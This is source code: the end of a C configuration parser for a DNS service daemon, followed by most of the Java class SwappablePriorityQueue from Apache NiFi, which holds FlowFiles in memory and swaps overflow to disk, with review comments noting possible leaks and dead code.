// An allow-update entry referenced a key that was never declared: hard error.
require_action( found, exit, err = 1 );
}
// Fill in the allow-query keys
for ( elem = zoneSpec->allowQuery; elem; elem = elem->next )
{
mDNSBool found = mDNSfalse;
for ( keySpec = g_keys; keySpec; keySpec = keySpec->next )
{
if ( strcmp( elem->string, keySpec->name ) == 0 )
{
DomainAuthInfo * authInfo = malloc( sizeof( DomainAuthInfo ) );
mDNSs32 keylen;
require_action( authInfo, exit, err = 1 );
memset( authInfo, 0, sizeof( DomainAuthInfo ) );
ok = MakeDomainNameFromDNSNameString( &authInfo->keyname, keySpec->name );
if (!ok) { free(authInfo); err = 1; goto exit; }
keylen = DNSDigest_ConstructHMACKeyfromBase64( authInfo, keySpec->secret );
if (keylen < 0) { free(authInfo); err = 1; goto exit; }
authInfo->next = zone->queryKeys;
zone->queryKeys = authInfo;
found = mDNStrue;
break;
}
}
// Log this
require_action( found, exit, err = 1 );
}
}
// NOTE(review): g_zones / g_keys and their list nodes are never freed here, so
// re-parsing leaks the previous parse's specs — confirm whether ParseConfig is
// only ever invoked once per process.
exit:
return err;
}
/* Copy parsed "options" values into the DaemonInfo, applying only fields that
 * were actually present in the config (non-empty string / non-zero port).
 *
 * NOTE(review): the only caller visible in this file is commented out in the
 * options_set grammar action, so this currently appears to be dead code —
 * confirm before removing.
 */
void
SetupOptions
(
OptionsInfo * info,
void * context
)
{
DaemonInfo * d = ( DaemonInfo* ) context;
if ( strlen( info->source_address ) )
{
inet_pton( AF_INET, info->source_address, &d->addr.sin_addr );
}
if ( info->source_port )
{
d->addr.sin_port = htons( ( mDNSu16 ) info->source_port );
}
if ( strlen( info->server_address ) )
{
inet_pton( AF_INET, info->server_address, &d->ns_addr.sin_addr );
}
if ( info->server_port )
{
d->ns_addr.sin_port = htons( ( mDNSu16 ) info->server_port );
}
if ( info->private_port )
{
d->private_port = mDNSOpaque16fromIntVal( info->private_port );
}
if ( info->llq_port )
{
d->llq_port = mDNSOpaque16fromIntVal( info->llq_port );
}
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.nifi.controller.queue;
import org.apache.nifi.controller.repository.FlowFileRecord;
import org.apache.nifi.controller.repository.FlowFileSwapManager;
import org.apache.nifi.controller.repository.IncompleteSwapFileException;
import org.apache.nifi.controller.repository.SwapContents;
import org.apache.nifi.controller.repository.SwapSummary;
import org.apache.nifi.controller.repository.claim.ResourceClaim;
import org.apache.nifi.controller.swap.StandardSwapSummary;
import org.apache.nifi.events.EventReporter;
import org.apache.nifi.flowfile.FlowFile;
import org.apache.nifi.flowfile.FlowFilePrioritizer;
import org.apache.nifi.flowfile.attributes.CoreAttributes;
import org.apache.nifi.processor.FlowFileFilter;
import org.apache.nifi.processor.FlowFileFilter.FlowFileFilterResult;
import org.apache.nifi.reporting.Severity;
import org.apache.nifi.util.concurrency.TimedLock;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.Iterator;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.PriorityQueue;
import java.util.Queue;
import java.util.Set;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicReference;
import java.util.concurrent.locks.ReentrantReadWriteLock;
/**
 * A prioritized FlowFile queue partition that keeps FlowFiles on the heap up to a
 * threshold and transparently swaps the overflow out to disk via a FlowFileSwapManager.
 */
public class SwappablePriorityQueue {
private static final Logger logger = LoggerFactory.getLogger(SwappablePriorityQueue.class);
// Number of FlowFiles written to (and read back from) a single swap file.
private static final int SWAP_RECORD_POLL_SIZE = 10_000;
// Cap on how many expired FlowFiles a single poll pass will collect.
private static final int MAX_EXPIRED_RECORDS_PER_ITERATION = 10_000;
// Max FlowFiles kept in the active (in-heap) queue before overflow goes to the swap queue.
private final int swapThreshold;
private final FlowFileSwapManager swapManager;
private final EventReporter eventReporter;
private final FlowFileQueue flowFileQueue;
private final DropFlowFileAction dropAction;
private final List<FlowFilePrioritizer> priorities = new ArrayList<>();
private final String swapPartitionName;
// Locations of swap files written out and not yet swapped back in. Guarded by lock.
private final List<String> swapLocations = new ArrayList<>();
// Aggregate accounting (active / swapped / unacknowledged counts and bytes), updated via CAS.
private final AtomicReference<FlowFileQueueSize> size = new AtomicReference<>(new FlowFileQueueSize(0, 0L, 0, 0L, 0, 0, 0L));
private final TimedLock readLock;
private final TimedLock writeLock;
// We keep an "active queue" and a "swap queue" that both are able to hold records in heap. When
// FlowFiles are added to this FlowFileQueue, we first check if we are in "swap mode" and if so
// we add to the 'swap queue' instead of the 'active queue'. The code would be much simpler if we
// eliminated the 'swap queue' and instead just used the active queue and swapped out the 10,000
// lowest priority FlowFiles from that. However, doing that would cause problems with the ordering
// of FlowFiles. If we swap out some FlowFiles, and then allow a new FlowFile to be written to the
// active queue, then we would end up processing the newer FlowFile before the swapped FlowFile. By
// keeping these separate, we are able to guarantee that FlowFiles are swapped in in the same order
// that they are swapped out.
// Guarded by lock.
private PriorityQueue<FlowFileRecord> activeQueue;
private ArrayList<FlowFileRecord> swapQueue;
// True once FlowFiles have overflowed into swapQueue; cleared when swapped data is drained.
private boolean swapMode = false;
/**
 * Creates the partition.
 *
 * @param swapManager used to write/read swap files when the in-heap threshold is exceeded
 * @param swapThreshold max FlowFiles held in the active queue before overflowing to swap
 * @param eventReporter receives error events for swap failures (may be null)
 * @param flowFileQueue the owning queue; its identifier names the timed locks
 * @param dropAction action invoked when FlowFiles are dropped
 * @param swapPartitionName partition name recorded in swap files written by this queue
 */
public SwappablePriorityQueue(final FlowFileSwapManager swapManager, final int swapThreshold, final EventReporter eventReporter, final FlowFileQueue flowFileQueue,
final DropFlowFileAction dropAction, final String swapPartitionName) {
this.swapManager = swapManager;
this.swapThreshold = swapThreshold;
this.activeQueue = new PriorityQueue<>(20, new QueuePrioritizer(Collections.emptyList()));
this.swapQueue = new ArrayList<>();
this.eventReporter = eventReporter;
this.flowFileQueue = flowFileQueue;
this.dropAction = dropAction;
this.swapPartitionName = swapPartitionName;
// Fair lock so readers/writers are granted access in arrival order.
final ReentrantReadWriteLock lock = new ReentrantReadWriteLock(true);
readLock = new TimedLock(lock.readLock(), flowFileQueue.getIdentifier() + " Read Lock", 100);
writeLock = new TimedLock(lock.writeLock(), flowFileQueue.getIdentifier() + " Write Lock", 100);
}
/**
 * @return the identifier of the FlowFileQueue that owns this partition
 */
private String getQueueIdentifier() {
    final String identifier = flowFileQueue.getIdentifier();
    return identifier;
}

/**
 * Returns the prioritizers currently applied to this queue. Guarded by the read
 * lock so callers see a consistent snapshot; the returned list is unmodifiable.
 *
 * @return an unmodifiable view of the configured FlowFilePrioritizers
 */
public List<FlowFilePrioritizer> getPriorities() {
    readLock.lock();
    try {
        final List<FlowFilePrioritizer> view = Collections.unmodifiableList(priorities);
        return view;
    } finally {
        readLock.unlock("getPriorities");
    }
}
/**
 * Replaces the queue's prioritizers and rebuilds the active queue so that
 * FlowFiles already enqueued are re-ordered under the new comparator.
 *
 * @param newPriorities the prioritizers to apply from now on
 */
public void setPriorities(final List<FlowFilePrioritizer> newPriorities) {
writeLock.lock();
try {
priorities.clear();
priorities.addAll(newPriorities);
// PriorityQueue has no "re-sort" operation, so build a new queue with the
// new comparator and move all records over.
final PriorityQueue<FlowFileRecord> newQueue = new PriorityQueue<>(Math.max(20, activeQueue.size()), new QueuePrioritizer(newPriorities));
newQueue.addAll(activeQueue);
activeQueue = newQueue;
} finally {
writeLock.unlock("setPriorities");
}
}
/**
 * Builds a point-in-time diagnostic snapshot of this partition: its size plus
 * whether any / all of the actively-queued FlowFiles are currently penalized.
 *
 * @return diagnostics describing the current state of this partition
 */
public LocalQueuePartitionDiagnostics getQueueDiagnostics() {
    readLock.lock();
    try {
        final boolean anyPenalized = !activeQueue.isEmpty() && activeQueue.peek().isPenalized();
        // BUG FIX: "all penalized" must verify that every record is penalized. The
        // previous code used anyMatch(), which is trivially true whenever anyPenalized
        // is true, so allPenalized was over-reported when only the head was penalized.
        final boolean allPenalized = anyPenalized && activeQueue.stream().allMatch(FlowFileRecord::isPenalized);
        return new StandardLocalQueuePartitionDiagnostics(getFlowFileQueueSize(), anyPenalized, allPenalized);
    } finally {
        readLock.unlock("getQueueDiagnostics");
    }
}
/**
 * Takes a point-in-time snapshot of the FlowFiles currently held in the active
 * (in-heap) queue. Swapped-out and unacknowledged FlowFiles are not included.
 *
 * @return a new list containing the active FlowFiles
 */
public List<FlowFileRecord> getActiveFlowFiles() {
    readLock.lock();
    try {
        final List<FlowFileRecord> snapshot = new ArrayList<>(activeQueue);
        return snapshot;
    } finally {
        readLock.unlock("getActiveFlowFiles");
    }
}

/**
 * @return true if at least one FlowFile has been polled from this partition but not yet acknowledged
 */
public boolean isUnacknowledgedFlowFile() {
    final int unacknowledged = getFlowFileQueueSize().getUnacknowledgedCount();
    return unacknowledged > 0;
}
/**
 * Writes full swap files (SWAP_RECORD_POLL_SIZE records each) out of the swap queue
 * once it has grown large enough, updating the aggregate size accounting. Records
 * that do not fill a complete swap file remain on the in-heap swap queue.
 *
 * This method MUST be called with the write lock held
 */
private void writeSwapFilesIfNecessary() {
if (swapQueue.size() < SWAP_RECORD_POLL_SIZE) {
return;
}
// Give the active queue first claim on these records; only swap out what still overflows.
migrateSwapToActive();
if (swapQueue.size() < SWAP_RECORD_POLL_SIZE) {
return;
}
final int numSwapFiles = swapQueue.size() / SWAP_RECORD_POLL_SIZE;
int originalSwapQueueCount = swapQueue.size();
long originalSwapQueueBytes = 0L;
for (final FlowFileRecord flowFile : swapQueue) {
originalSwapQueueBytes += flowFile.getSize();
}
// Create a new Priority queue with the same prioritizers that are set for this queue. We want to swap out the highest priority data first, because
// whatever data we don't write out to a swap file (because there isn't enough to fill a swap file) will be added back to the swap queue.
// Since the swap queue cannot be processed until all swap files, we want to ensure that only the lowest priority data goes back onto it. Which means
// that we must swap out the highest priority data that is currently on the swap queue.
final PriorityQueue<FlowFileRecord> tempQueue = new PriorityQueue<>(swapQueue.size(), new QueuePrioritizer(getPriorities()));
tempQueue.addAll(swapQueue);
long bytesSwappedOut = 0L;
int flowFilesSwappedOut = 0;
final List<String> swapLocations = new ArrayList<>(numSwapFiles);
for (int i = 0; i < numSwapFiles; i++) {
long bytesSwappedThisIteration = 0L;
// Create a new swap file for the next SWAP_RECORD_POLL_SIZE records
final List<FlowFileRecord> toSwap = new ArrayList<>(SWAP_RECORD_POLL_SIZE);
for (int j = 0; j < SWAP_RECORD_POLL_SIZE; j++) {
final FlowFileRecord flowFile = tempQueue.poll();
toSwap.add(flowFile);
bytesSwappedThisIteration += flowFile.getSize();
}
try {
Collections.reverse(toSwap); // currently ordered in reverse priority order based on the ordering of the temp queue.
final String swapLocation = swapManager.swapOut(toSwap, flowFileQueue, swapPartitionName);
swapLocations.add(swapLocation);
logger.debug("Successfully wrote out Swap File {} containing {} FlowFiles ({} bytes)", swapLocation, toSwap.size(), bytesSwappedThisIteration);
bytesSwappedOut += bytesSwappedThisIteration;
flowFilesSwappedOut += toSwap.size();
} catch (final IOException ioe) {
tempQueue.addAll(toSwap); // if we failed, we must add the FlowFiles back to the queue.
final int objectCount = getFlowFileCount();
logger.error("FlowFile Queue with identifier {} has {} FlowFiles queued up. Attempted to spill FlowFile information over to disk in order to avoid exhausting "
+ "the Java heap space but failed to write information to disk due to {}", getQueueIdentifier(), objectCount, ioe.toString());
logger.error("", ioe);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.ERROR, "Failed to Overflow to Disk", "Flowfile Queue with identifier " + getQueueIdentifier() + " has " + objectCount +
" queued up. Attempted to spill FlowFile information over to disk in order to avoid exhausting the Java heap space but failed to write information to disk. "
+ "See logs for more information.");
}
// Stop writing further swap files; remaining records go back to the swap queue below.
break;
}
}
// Pull any records off of the temp queue that won't fit back on the active queue, and add those to the
// swap queue. Then add the records back to the active queue.
swapQueue.clear();
long updatedSwapQueueBytes = 0L;
FlowFileRecord record;
while ((record = tempQueue.poll()) != null) {
swapQueue.add(record);
updatedSwapQueueBytes += record.getSize();
}
Collections.reverse(swapQueue); // currently ordered in reverse priority order based on the ordering of the temp queue
// CAS-retry loop: fold the net change into the shared size atomically.
boolean updated = false;
while (!updated) {
final FlowFileQueueSize originalSize = getFlowFileQueueSize();
final int addedSwapRecords = swapQueue.size() - originalSwapQueueCount;
final long addedSwapBytes = updatedSwapQueueBytes - originalSwapQueueBytes;
final FlowFileQueueSize newSize = new FlowFileQueueSize(originalSize.getActiveCount(), originalSize.getActiveBytes(),
originalSize.getSwappedCount() + addedSwapRecords + flowFilesSwappedOut,
originalSize.getSwappedBytes() + addedSwapBytes + bytesSwappedOut,
originalSize.getSwapFileCount() + numSwapFiles,
originalSize.getUnacknowledgedCount(), originalSize.getUnacknowledgedBytes());
updated = updateSize(originalSize, newSize);
if (updated) {
logIfNegative(originalSize, newSize, "swap");
}
}
this.swapLocations.addAll(swapLocations);
logger.debug("After writing swap files, setting new set of Swap Locations to {}", this.swapLocations);
}
/**
 * @return the total number of FlowFiles tracked by this partition:
 *         active + swapped out + polled-but-unacknowledged
 */
private int getFlowFileCount() {
    final FlowFileQueueSize snapshot = getFlowFileQueueSize();
    int total = snapshot.getActiveCount();
    total += snapshot.getSwappedCount();
    total += snapshot.getUnacknowledgedCount();
    return total;
}
/**
 * If there are FlowFiles waiting on the swap queue, move them to the active
 * queue until we meet our threshold. This prevents us from having to swap
 * them to disk & then back out.
 *
 * This method MUST be called with the writeLock held.
 */
private void migrateSwapToActive() {
// Migrate as many FlowFiles as we can from the Swap Queue to the Active Queue, so that we don't
// have to swap them out & then swap them back in.
// If we don't do this, we could get into a situation where we have potentially thousands of FlowFiles
// sitting on the Swap Queue but not getting processed because there aren't enough to be swapped out.
// In particular, this can happen if the queue is typically filled with surges.
// For example, if the queue has 25,000 FlowFiles come in, it may process 20,000 of them and leave
// 5,000 sitting on the Swap Queue. If it then takes an hour for an additional 5,000 FlowFiles to come in,
// those FlowFiles sitting on the Swap Queue will sit there for an hour, waiting to be swapped out and
// swapped back in again.
// Calling this method when records are polled prevents this condition by migrating FlowFiles from the
// Swap Queue to the Active Queue. However, we don't do this if there are FlowFiles already swapped out
// to disk, because we want them to be swapped back in in the same order that they were swapped out.
if (!activeQueue.isEmpty()) {
return;
}
// If there are swap files waiting to be swapped in, swap those in first. We do this in order to ensure that those that
// were swapped out first are then swapped back in first. If we instead just immediately migrated the FlowFiles from the
// swap queue to the active queue, and we never run out of FlowFiles in the active queue (because destination cannot
// keep up with queue), we will end up always processing the new FlowFiles first instead of the FlowFiles that arrived
// first.
if (!swapLocations.isEmpty()) {
swapIn();
return;
}
// this is the most common condition (nothing is swapped out), so do the check first and avoid the expense
// of other checks for 99.999% of the cases.
final FlowFileQueueSize size = getFlowFileQueueSize();
if (size.getSwappedCount() == 0 && swapQueue.isEmpty()) {
return;
}
if (size.getSwappedCount() > swapQueue.size()) {
// we already have FlowFiles swapped out, so we won't migrate the queue; we will wait for
// the files to be swapped back in first
return;
}
// Swap Queue is not currently ordered. We want to migrate the highest priority FlowFiles to the Active Queue, then re-queue the lowest priority items.
final PriorityQueue<FlowFileRecord> tempQueue = new PriorityQueue<>(swapQueue.size(), new QueuePrioritizer(getPriorities()));
tempQueue.addAll(swapQueue);
int recordsMigrated = 0;
long bytesMigrated = 0L;
// Move the highest-priority records into the active queue until it reaches the threshold.
while (activeQueue.size() < swapThreshold) {
final FlowFileRecord toMigrate = tempQueue.poll();
if (toMigrate == null) {
break;
}
activeQueue.add(toMigrate);
bytesMigrated += toMigrate.getSize();
recordsMigrated++;
}
// Whatever did not fit goes back onto the swap queue.
swapQueue.clear();
FlowFileRecord toRequeue;
while ((toRequeue = tempQueue.poll()) != null) {
swapQueue.add(toRequeue);
}
if (recordsMigrated > 0) {
incrementActiveQueueSize(recordsMigrated, bytesMigrated);
incrementSwapQueueSize(-recordsMigrated, -bytesMigrated, 0);
logger.debug("Migrated {} FlowFiles from swap queue to active queue for {}", recordsMigrated, this);
}
// NOTE: `size` is the snapshot taken before migration; leaving swap mode is keyed
// off the pre-migration swapped count.
if (size.getSwappedCount() == 0) {
swapMode = false;
}
}
/**
 * Swaps in the oldest swap file (head of swapLocations) and moves its FlowFiles onto
 * the active queue, adjusting the size accounting. Must be called with the write lock
 * held. Failure handling varies by cause: a missing or truncated file is dropped from
 * swapLocations; transient I/O or unexpected errors leave the location in place so the
 * swap-in is retried later.
 */
private void swapIn() {
final String swapLocation = swapLocations.get(0);
boolean partialContents = false;
SwapContents swapContents;
try {
logger.debug("Attempting to swap in {}; all swap locations = {}", swapLocation, swapLocations);
swapContents = swapManager.swapIn(swapLocation, flowFileQueue);
swapLocations.remove(0);
} catch (final IncompleteSwapFileException isfe) {
logger.error("Failed to swap in all FlowFiles from Swap File {}; Swap File ended prematurely. The records that were present will still be swapped in", swapLocation);
logger.error("", isfe);
swapContents = isfe.getPartialContents();
partialContents = true;
swapLocations.remove(0);
} catch (final FileNotFoundException fnfe) {
logger.error("Failed to swap in FlowFiles from Swap File {} because the Swap File can no longer be found", swapLocation);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.ERROR, "Swap File", "Failed to swap in FlowFiles from Swap File " + swapLocation + " because the Swap File can no longer be found");
}
swapLocations.remove(0);
return;
} catch (final IOException ioe) {
logger.error("Failed to swap in FlowFiles from Swap File {}; Swap File appears to be corrupt!", swapLocation);
logger.error("", ioe);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.ERROR, "Swap File", "Failed to swap in FlowFiles from Swap File " +
swapLocation + "; Swap File appears to be corrupt! Some FlowFiles in the queue may not be accessible. See logs for more information.");
}
// We do not remove the Swap File from swapLocations because the IOException may be recoverable later. For instance, the file may be on a network
// drive and we may have connectivity problems, etc.
return;
} catch (final Throwable t) {
logger.error("Failed to swap in FlowFiles from Swap File {}", swapLocation, t);
// We do not remove the Swap File from swapLocations because this is an unexpected failure that may be retry-able. For example, if there were
// an OOME, etc. then we don't want to he queue to still reflect that the data is around but never swap it in. By leaving the Swap File
// in swapLocations, we will continue to retry.
throw t;
}
final QueueSize swapSize = swapContents.getSummary().getQueueSize();
final long contentSize = swapSize.getByteCount();
final int flowFileCount = swapSize.getObjectCount();
// Deduct the whole file's summary from the swapped accounting (one fewer swap file).
incrementSwapQueueSize(-flowFileCount, -contentSize, -1);
if (partialContents) {
// if we have partial results, we need to calculate the content size of the flowfiles
// actually swapped back in.
long contentSizeSwappedIn = 0L;
for (final FlowFileRecord swappedIn : swapContents.getFlowFiles()) {
contentSizeSwappedIn += swappedIn.getSize();
}
incrementActiveQueueSize(swapContents.getFlowFiles().size(), contentSizeSwappedIn);
logger.debug("Swapped in partial contents containing {} FlowFiles ({} bytes) from {}", swapContents.getFlowFiles().size(), contentSizeSwappedIn, swapLocation);
} else {
// we swapped in the whole swap file. We can just use the info that we got from the summary.
incrementActiveQueueSize(flowFileCount, contentSize);
logger.debug("Successfully swapped in Swap File {} containing {} FlowFiles ({} bytes)", swapLocation, flowFileCount, contentSize);
}
activeQueue.addAll(swapContents.getFlowFiles());
}
/**
 * @return the current overall size (object and byte counts) of this partition,
 *         including active, swapped, and unacknowledged FlowFiles
 */
public QueueSize size() {
    final FlowFileQueueSize snapshot = getFlowFileQueueSize();
    return snapshot.toQueueSize();
}

/**
 * @return true if this partition holds no FlowFiles at all
 *         (active, swapped, or unacknowledged)
 */
public boolean isEmpty() {
    final FlowFileQueueSize snapshot = getFlowFileQueueSize();
    return snapshot.isEmpty();
}
/**
 * Determines whether any FlowFile could be returned by a poll right now.
 * Relies on the active queue's ordering placing penalized records last: if the
 * head record is penalized, nothing behind it is available either. For data
 * that is entirely swapped out to disk, availability is assumed.
 *
 * @return true if at least one FlowFile is (assumed to be) available for polling
 */
public boolean isFlowFileAvailable() {
if (isEmpty()) {
return false;
}
readLock.lock();
try {
// If we have data in the active or swap queue that is penalized, then we know that all FlowFiles
// are penalized. As a result, we can say that no FlowFile is available.
FlowFileRecord firstRecord = activeQueue.peek();
if (firstRecord == null && !swapQueue.isEmpty()) {
firstRecord = swapQueue.get(0);
}
if (firstRecord == null) {
// If the queue is not empty, then all data is swapped out. We don't actually know whether or not the swapped out data is penalized, so we assume
// that it is not penalized and is therefore available.
return !isEmpty();
}
// We do have a FlowFile that was retrieved from the active or swap queue. It is available if it is not penalized.
return !firstRecord.isPenalized();
} finally {
readLock.unlock("isFlowFileAvailable");
}
}
/**
 * NOTE(review): despite the name, this reports true only when there are neither
 * active nor swapped-out FlowFiles — i.e. nothing that could become pollable.
 * Confirm the intended semantics before renaming.
 *
 * @return true if both the active count and the swapped count are zero
 */
public boolean isActiveQueueEmpty() {
    final FlowFileQueueSize snapshot = getFlowFileQueueSize();
    final boolean noActive = snapshot.getActiveCount() == 0;
    final boolean noSwapped = snapshot.getSwappedCount() == 0;
    return noActive && noSwapped;
}

/**
 * Acknowledges a single previously-polled FlowFile, removing it from the
 * unacknowledged accounting.
 */
public void acknowledge(final FlowFileRecord flowFile) {
    logger.trace("{} Acknowledging {}", this, flowFile);
    final long bytes = flowFile.getSize();
    incrementUnacknowledgedQueueSize(-1, -bytes);
}

/**
 * Acknowledges a batch of previously-polled FlowFiles, removing them from the
 * unacknowledged accounting.
 */
public void acknowledge(final Collection<FlowFileRecord> flowFiles) {
    logger.trace("{} Acknowledging {}", this, flowFiles);
    long totalBytes = 0L;
    for (final FlowFileRecord flowFile : flowFiles) {
        totalBytes += flowFile.getSize();
    }
    incrementUnacknowledgedQueueSize(-flowFiles.size(), -totalBytes);
}
/**
 * Enqueues a single FlowFile. If the partition is already in swap mode, or the
 * active queue has reached the swap threshold, the FlowFile goes onto the in-heap
 * swap queue (possibly triggering a swap-file write); otherwise it goes onto the
 * active queue.
 *
 * @param flowFile the FlowFile to enqueue
 */
public void put(final FlowFileRecord flowFile) {
writeLock.lock();
try {
if (swapMode || activeQueue.size() >= swapThreshold) {
swapQueue.add(flowFile);
incrementSwapQueueSize(1, flowFile.getSize(), 0);
swapMode = true;
writeSwapFilesIfNecessary();
} else {
incrementActiveQueueSize(1, flowFile.getSize());
activeQueue.add(flowFile);
}
logger.trace("{} put to {}", flowFile, this);
} finally {
writeLock.unlock("put(FlowFileRecord)");
}
}
/**
 * Enqueues a batch of FlowFiles. The whole batch goes either to the swap queue or
 * the active queue: it is diverted to swap when the partition is in swap mode or
 * when adding the batch would push the active queue past the swap threshold.
 *
 * @param flowFiles the FlowFiles to enqueue
 */
public void putAll(final Collection<FlowFileRecord> flowFiles) {
final int numFiles = flowFiles.size();
long bytes = 0L;
for (final FlowFile flowFile : flowFiles) {
bytes += flowFile.getSize();
}
writeLock.lock();
try {
// "swapThreshold - numFiles" ensures the entire batch fits under the threshold.
if (swapMode || activeQueue.size() >= swapThreshold - numFiles) {
swapQueue.addAll(flowFiles);
incrementSwapQueueSize(numFiles, bytes, 0);
swapMode = true;
writeSwapFilesIfNecessary();
} else {
incrementActiveQueueSize(numFiles, bytes);
activeQueue.addAll(flowFiles);
}
logger.trace("{} put to {}", flowFiles, this);
} finally {
writeLock.unlock("putAll");
}
}
/**
 * Polls a single FlowFile from the partition. Expired FlowFiles encountered while
 * polling are added to {@code expiredRecords}. A returned FlowFile is counted as
 * unacknowledged until {@link #acknowledge} is called for it.
 *
 * @param expiredRecords collector for FlowFiles found to be expired
 * @param expirationMillis the FlowFile expiration period in milliseconds
 * @return the polled FlowFile, or null if none is available
 */
public FlowFileRecord poll(final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
    writeLock.lock();
    try {
        final FlowFileRecord flowFile = doPoll(expiredRecords, expirationMillis);
        if (flowFile == null) {
            return null;
        }
        logger.trace("{} poll() returning {}", this, flowFile);
        incrementUnacknowledgedQueueSize(1, flowFile.getSize());
        return flowFile;
    } finally {
        writeLock.unlock("poll(Set)");
    }
}
/**
 * Polls one non-expired, non-penalized FlowFile from the active queue, first
 * migrating swapped records in if the active queue is empty. Expired records
 * encountered along the way are collected into {@code expiredRecords} (bounded
 * by MAX_EXPIRED_RECORDS_PER_ITERATION). Must be called with the write lock held.
 *
 * NOTE(review): when the active queue is empty, isExpired() is invoked with a
 * null FlowFile — presumably it tolerates null (its implementation is not
 * visible here); confirm.
 *
 * @return the polled FlowFile, or null if none is currently available
 */
private FlowFileRecord doPoll(final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
FlowFileRecord flowFile;
boolean isExpired;
migrateSwapToActive();
long expiredBytes = 0L;
do {
flowFile = this.activeQueue.poll();
isExpired = isExpired(flowFile, expirationMillis);
if (isExpired) {
expiredRecords.add(flowFile);
expiredBytes += flowFile.getSize();
flowFile = null;
if (expiredRecords.size() >= MAX_EXPIRED_RECORDS_PER_ITERATION) {
break;
}
} else if (flowFile != null && flowFile.isPenalized()) {
// Penalized records sort last, so nothing behind this one is pollable either.
this.activeQueue.add(flowFile);
flowFile = null;
break;
}
if (flowFile != null) {
incrementActiveQueueSize(-1, -flowFile.getSize());
}
} while (isExpired);
// Expired records leave the active accounting in one bulk adjustment.
if (!expiredRecords.isEmpty()) {
incrementActiveQueueSize(-expiredRecords.size(), -expiredBytes);
}
return flowFile;
}
/**
 * Polls up to {@code maxResults} FlowFiles, collecting any expired records into
 * {@code expiredRecords}. Returned FlowFiles are counted as unacknowledged.
 *
 * NOTE(review): Math.min(1, maxResults) caps the ArrayList's *initial capacity*
 * at 1 — harmless since ArrayList grows, but presumably the intent was to size
 * it relative to maxResults; confirm before changing.
 *
 * @param maxResults maximum number of FlowFiles to return
 * @param expiredRecords collector for FlowFiles found to be expired
 * @param expirationMillis the FlowFile expiration period in milliseconds
 * @return the polled FlowFiles (possibly empty, never null)
 */
public List<FlowFileRecord> poll(int maxResults, final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
final List<FlowFileRecord> records = new ArrayList<>(Math.min(1, maxResults));
// First check if we have any records Pre-Fetched.
writeLock.lock();
try {
doPoll(records, maxResults, expiredRecords, expirationMillis);
} finally {
writeLock.unlock("poll(int, Set)");
}
if (!records.isEmpty()) {
logger.trace("{} poll() returning {}", this, records);
}
return records;
}
/**
 * Polls FlowFiles selected by the given filter. Iterates the active queue in
 * priority order, handing each non-expired, non-penalized FlowFile to the filter;
 * accepted records are returned (and counted as unacknowledged), rejected ones are
 * restored to the queue. Iteration stops when the filter says not to continue, a
 * penalized record is reached, or the expired-record cap is hit.
 *
 * @param filter decides which FlowFiles to select and when to stop
 * @param expiredRecords collector for FlowFiles found to be expired
 * @param expirationMillis the FlowFile expiration period in milliseconds
 * @return the FlowFiles accepted by the filter (possibly empty, never null)
 */
public List<FlowFileRecord> poll(final FlowFileFilter filter, final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
long bytesPulled = 0L;
int flowFilesPulled = 0;
writeLock.lock();
try {
migrateSwapToActive();
final List<FlowFileRecord> selectedFlowFiles = new ArrayList<>();
final List<FlowFileRecord> unselected = new ArrayList<>();
while (true) {
FlowFileRecord flowFile = this.activeQueue.poll();
if (flowFile == null) {
break;
}
final boolean isExpired = isExpired(flowFile, expirationMillis);
if (isExpired) {
expiredRecords.add(flowFile);
bytesPulled += flowFile.getSize();
flowFilesPulled++;
if (expiredRecords.size() >= MAX_EXPIRED_RECORDS_PER_ITERATION) {
break;
} else {
continue;
}
} else if (flowFile.isPenalized()) {
this.activeQueue.add(flowFile);
break; // just stop searching because the rest are all penalized.
}
final FlowFileFilterResult result = filter.filter(flowFile);
if (result.isAccept()) {
bytesPulled += flowFile.getSize();
flowFilesPulled++;
incrementUnacknowledgedQueueSize(1, flowFile.getSize());
selectedFlowFiles.add(flowFile);
} else {
unselected.add(flowFile);
}
if (!result.isContinue()) {
break;
}
}
// Rejected records go back on the queue; accepted + expired leave the active accounting.
this.activeQueue.addAll(unselected);
incrementActiveQueueSize(-flowFilesPulled, -bytesPulled);
if (!selectedFlowFiles.isEmpty()) {
logger.trace("{} poll() returning {}", this, selectedFlowFiles);
}
return selectedFlowFiles;
} finally {
writeLock.unlock("poll(Filter, Set)");
}
}
/**
 * Drains up to {@code maxResults} FlowFiles from the active queue into {@code records},
 * collecting expired records into {@code expiredRecords}, and updates size accounting.
 * Must be called with the write lock held.
 */
private void doPoll(final List<FlowFileRecord> records, int maxResults, final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
migrateSwapToActive();
// bytesDrained covers everything removed from the queue: returned records AND expired ones.
final long bytesDrained = drainQueue(activeQueue, records, maxResults, expiredRecords, expirationMillis);
long expiredBytes = 0L;
for (final FlowFileRecord record : expiredRecords) {
expiredBytes += record.getSize();
}
// Everything drained leaves the active queue, but only the non-expired records
// (bytesDrained - expiredBytes) become unacknowledged.
incrementActiveQueueSize(-(expiredRecords.size() + records.size()), -bytesDrained);
incrementUnacknowledgedQueueSize(records.size(), bytesDrained - expiredBytes);
}
/**
 * Determines whether the given FlowFile has outlived the configured expiration period.
 *
 * @param flowFile the FlowFile to check; may be null (a null FlowFile never expires)
 * @param expirationMillis maximum age in milliseconds; <= 0 disables expiration
 * @return true if the FlowFile's expiration time has already passed
 */
protected boolean isExpired(final FlowFile flowFile, final long expirationMillis) {
